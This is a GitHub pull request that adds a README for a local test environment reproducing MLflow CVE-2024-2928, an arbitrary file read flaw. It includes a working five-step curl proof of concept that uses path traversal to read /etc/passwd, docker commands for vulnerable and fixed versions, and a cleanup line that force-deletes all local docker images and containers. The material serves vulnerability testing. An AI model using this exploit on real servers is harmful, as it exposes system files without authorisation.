Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add CVE-2024-2928 Environment #83

Open
wants to merge 2 commits into
base: main
Choose a base branch
from
Open

Add CVE-2024-2928 Environment #83

Changes from all commits
Commits
Show all changes
2 commits
Select commit Hold shift + click to select a range
5b841dc
Add CVE-2024-2928 Environment
frkngksl Aug 20, 2024
3a84cca
Update README.md
frkngksl Sep 30, 2024
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
43 changes: 43 additions & 0 deletions mlflow/CVE-2024-2928/README.md
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,43 @@
# MLflow CVE-2024-2928

This directory contains the deployment config for MLflow instances vulnerable and fixed to CVE-2024-2928. MLflow versions below 2.11.2 are vulnerable to that arbitrary file read vulnerability.

## How to Trigger the Vulnerability?

To trigger the vulnerability, you can use the following five curl commands. In a vulnerable environment, after the final curl request, you can see the /etc/passwd file content in the response.
```
# Create a malicious experiment:
curl -X POST -H 'Content-Type: application/json' -d '{"name": "poc", "artifact_location": "http:///#/../../../../../../../../../../../../../../etc/"}' 'http://127.0.0.1:5000/ajax-api/2.0/mlflow/experiments/create'

# Associate a run to it (EXPERIMENT_ID is coming from the first curl request's response):
curl -X POST -H 'Content-Type: application/json' -d '{"experiment_id": "EXPERIMENT_ID"}' 'http://127.0.0.1:5000/api/2.0/mlflow/runs/create'

# Create a registered model:
curl -X POST -H 'Content-Type: application/json' -d '{"name": "poc"}' 'http://127.0.0.1:5000/ajax-api/2.0/mlflow/registered-models/create'

# Link a model version to the malicious run (RUN_ID is coming from the second curl request's response. It is below the lifecycle_stage key in the JSON response):
curl -X POST -H 'Content-Type: application/json' -d '{"name": "poc", "run_id": "RUN_ID", "source": "file:///etc/"}' 'http://127.0.0.1:5000/ajax-api/2.0/mlflow/model-versions/create'

# Read /etc/passwd:
curl 'http://127.0.0.1:5000/model-versions/get-artifact?path=passwd&name=poc&version=1'
```

In case you cannot trigger the vulnerability, you might need to delete your existing container images because Docker might try to reuse them.

```
sudo docker rmi -f $(sudo docker images -aq)
sudo docker remove $(sudo docker ps -a -q)
```
## Fixed version
```
docker run -p 127.0.0.1:5000:5000 ghcr.io/mlflow/mlflow:v2.11.3 mlflow server --host 0.0.0.0 --port 5000
frkngksl marked this conversation as resolved.
Show resolved Hide resolved
```

The deployed service listens on `localhost:5000` after the docker completes its job.

## Vulnerable version
```
docker run -p 127.0.0.1:5000:5000 ghcr.io/mlflow/mlflow:v2.9.2 mlflow server --host 0.0.0.0 --port 5000
frkngksl marked this conversation as resolved.
Show resolved Hide resolved
```

The deployed service listens on `localhost:5000` after the docker completes its job.